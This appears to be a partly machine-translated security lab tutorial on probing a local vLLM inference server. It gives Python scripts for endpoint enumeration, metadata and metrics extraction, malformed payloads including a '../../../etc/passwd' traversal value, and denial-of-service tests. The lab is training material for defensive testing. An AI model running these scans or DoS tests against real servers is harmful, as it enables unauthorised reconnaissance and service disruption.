實驗室: Inference Server 利用ation
攻擊 vLLM, TGI, and Triton inference servers to discover information disclosure vulnerabilities, denial-of-service vectors, and configuration weaknesses in model serving infrastructure.
先備知識
- Docker and Docker Compose installed
- 理解 of REST APIs and gRPC
- Python with
httpx,grpcio, andpython-dotenv - Familiarity with model serving architectures
pip install httpx grpcio grpcio-tools aiohttp python-dotenvBackground
Inference servers like vLLM, HuggingFace TGI, and NVIDIA Triton are the backbone of production LLM deployments. Their 攻擊面 extends beyond 模型 itself to include management APIs, health endpoints, metrics dashboards, and configuration interfaces that may expose sensitive information or enable denial of service.
Lab Exercises
Deploy a Vulnerable Inference Server
Set up a local vLLM instance with default configuration to serve as the attack target.
version: "3.8" services: vllm: image: vllm/vllm-openai:latest ports: - "8000:8000" command: > --model TinyLlama/TinyLlama-1.1B-Chat-v1.0 --max-model-len 2048 --dtype float16 deploy: resources: reservations: devices: - driver: nvidia count: 1 capabilities: [gpu] environment: - VLLM_LOGGING_LEVEL=DEBUGdocker compose up -d # Wait for model to load sleep 30 curl http://localhost:8000/healthEnumerate Exposed Endpoints
Discover and catalog all endpoints exposed by the 推論 server.
#!/usr/bin/env python3 """Enumerate 推論 server endpoints for information disclosure.""" import httpx BASE_URL = "http://localhost:8000" # Common 推論 server endpoints across vLLM, TGI, and Triton ENDPOINTS = [ # vLLM endpoints "/health", "/v1/models", "/v1/completions", "/v1/chat/completions", "/metrics", "/version", "/tokenize", "/detokenize", # Common debug/management endpoints "/debug", "/config", "/status", "/info", "/v2/health/ready", "/v2/health/live", "/v2/models", "/v2/repository/index", # Metrics and 監控 "/metrics/prometheus", "/stats", "/dashboard", # Documentation "/docs", "/redoc", "/openapi.json", ] def enumerate_endpoints(): results = {"accessible": [], "forbidden": [], "not_found": []} for endpoint in ENDPOINTS: try: resp = httpx.get(f"{BASE_URL}{endpoint}", timeout=5) if resp.status_code == 200: results["accessible"].append({ "path": endpoint, "content_type": resp.headers.get("content-type", "unknown"), "body_preview": resp.text[:200], }) elif resp.status_code == 403: results["forbidden"].append(endpoint) else: results["not_found"].append(endpoint) except httpx.RequestError: results["not_found"].append(endpoint) print("=== Accessible Endpoints ===") for ep in results["accessible"]: print(f" {ep['path']} [{ep['content_type']}]") print(f" {ep['body_preview'][:100]}...") print(f"\n=== Forbidden: {len(results['forbidden'])} ===") print(f"=== Not Found: {len(results['not_found'])} ===") return results if __name__ == "__main__": enumerate_endpoints()python endpoint_enum.pyExtract Model and System Information
Use discovered endpoints to extract sensitive configuration details.
#!/usr/bin/env python3 """Extract model and system information from 推論 server.""" import httpx import json BASE_URL = "http://localhost:8000" def extract_model_info(): """Extract model configuration and metadata.""" print("=== Model Information ===") # Model list reveals model names, sizes, and configuration resp = httpx.get(f"{BASE_URL}/v1/models", timeout=5) if resp.status_code == 200: models = resp.json() print(f"Models: {json.dumps(models, indent=2)}") # OpenAPI schema reveals all available parameters resp = httpx.get(f"{BASE_URL}/openapi.json", timeout=5) if resp.status_code == 200: schema = resp.json() paths = list(schema.get("paths", {}).keys()) print(f"\nAPI paths: {paths}") def extract_metrics(): """Extract Prometheus metrics for infrastructure intelligence.""" print("\n=== Prometheus Metrics ===") resp = httpx.get(f"{BASE_URL}/metrics", timeout=5) if resp.status_code == 200: lines = resp.text.split("\n") interesting = [l for l in lines if any( k in l for k in ["gpu", "memory", "model", "cache", "queue", "batch"] ) and not l.startswith("#")] for line in interesting[:20]: print(f" {line}") def extract_error_info(): """Trigger errors to extract stack traces and internal info.""" print("\n=== Error Information Extraction ===") # Send malformed requests to trigger verbose errors payloads = [ {"model": "nonexistent-model", "messages": [{"role": "user", "content": "測試"}]}, {"model": "../../../etc/passwd", "prompt": "測試"}, {"messages": [{"role": "system", "content": "A" * 100000}]}, ] for payload in payloads: try: resp = httpx.post( f"{BASE_URL}/v1/chat/completions", json=payload, timeout=10, ) if resp.status_code != 200: error_body = resp.text[:500] print(f" Status {resp.status_code}: {error_body}") except Exception as e: print(f" Exception: {e}") if __name__ == "__main__": extract_model_info() extract_metrics() extract_error_info()python info_extraction.pyDocument all information disclosed through each endpoint.
測試 Denial-of-Service Vectors
識別 resource exhaustion and DoS vectors specific to 推論 servers.
#!/usr/bin/env python3 """測試 denial-of-service vectors against 推論 server. WARNING: Run only against local 測試 instances. Never against production.""" import httpx import time import threading from concurrent.futures import ThreadPoolExecutor BASE_URL = "http://localhost:8000" def test_context_overflow(): """測試 handling of max-context-length inputs.""" print("=== Context Overflow 測試 ===") long_prompt = "Repeat this. " * 10000 # Exceed 上下文視窗 try: start = time.time() resp = httpx.post( f"{BASE_URL}/v1/chat/completions", json={ "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0", "messages": [{"role": "user", "content": long_prompt}], "max_tokens": 10, }, timeout=30, ) elapsed = time.time() - start print(f" Status: {resp.status_code} ({elapsed:.1f}s)") print(f" Response: {resp.text[:200]}") except Exception as e: print(f" Error: {e}") def test_concurrent_load(): """測試 server behavior under concurrent request load.""" print("\n=== Concurrent Load 測試 ===") def make_request(i): try: start = time.time() resp = httpx.post( f"{BASE_URL}/v1/chat/completions", json={ "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0", "messages": [{"role": "user", "content": f"Count to {i}"}], "max_tokens": 100, }, timeout=60, ) elapsed = time.time() - start return {"id": i, "status": resp.status_code, "latency": elapsed} except Exception as e: return {"id": i, "status": "error", "error": str(e)} # Gradually increase concurrency for concurrent in [5, 10, 20]: with ThreadPoolExecutor(max_workers=concurrent) as executor: start = time.time() futures = [executor.submit(make_request, i) for i in range(concurrent)] results = [f.result() for f in futures] total = time.time() - start errors = sum(1 for r in results if r["status"] != 200) avg_latency = sum( r.get("latency", 0) for r in results if r["status"] == 200 ) / max(1, concurrent - errors) print(f" Concurrent={concurrent}: errors={errors}, " f"avg_latency={avg_latency:.1f}s, total={total:.1f}s") def test_max_tokens_abuse(): """測試 behavior with extreme max_tokens values.""" print("\n=== Max Tokens Abuse ===") for max_tokens in [1, 100, 10000, 100000, -1, 0]: try: resp = httpx.post( f"{BASE_URL}/v1/chat/completions", json={ "model": "TinyLlama/TinyLlama-1.1B-Chat-v1.0", "messages": [{"role": "user", "content": "Hi"}], "max_tokens": max_tokens, }, timeout=30, ) print(f" max_tokens={max_tokens}: status={resp.status_code}") except Exception as e: print(f" max_tokens={max_tokens}: error={e}") if __name__ == "__main__": test_context_overflow() test_concurrent_load() test_max_tokens_abuse()python dos_vectors.py
Troubleshooting
| Issue | Solution |
|---|---|
| Docker container fails to start | Verify GPU drivers and NVIDIA container toolkit installation |
| No GPU available | Use CPU-only mode by removing GPU configuration from docker-compose |
| Server returns 503 during tests | 模型 may still be loading; wait longer after startup |
| Metrics endpoint not found | Different server versions expose metrics at different paths |
相關主題
- Container Breakout - Escaping from containerized 推論 servers
- Model Serving 攻擊 - Broader model serving framework attacks
- GPU Side-Channel - Hardware-level information leakage
- Full-Stack 利用 - Chaining infrastructure with model 漏洞
參考文獻
- "vLLM: Easy, Fast, and Cheap LLM Serving with PagedAttention" - Kwon et al. (2023) - Architecture of the vLLM 推論 server
- "安全 Analysis of ML Inference Servers" - Chen et al. (2024) - 安全 評估 of common 推論 frameworks
- "Denial of Service 攻擊 on Machine Learning Systems" - Shumailov et al. (2021) - DoS vectors specific to ML infrastructure
- "MLSecOps: Securing ML Model Serving Pipelines" - Kumar et al. (2024) - 安全 best practices for 推論 infrastructure
Why are 推論 server endpoints a 安全 concern even when the underlying model is well-aligned?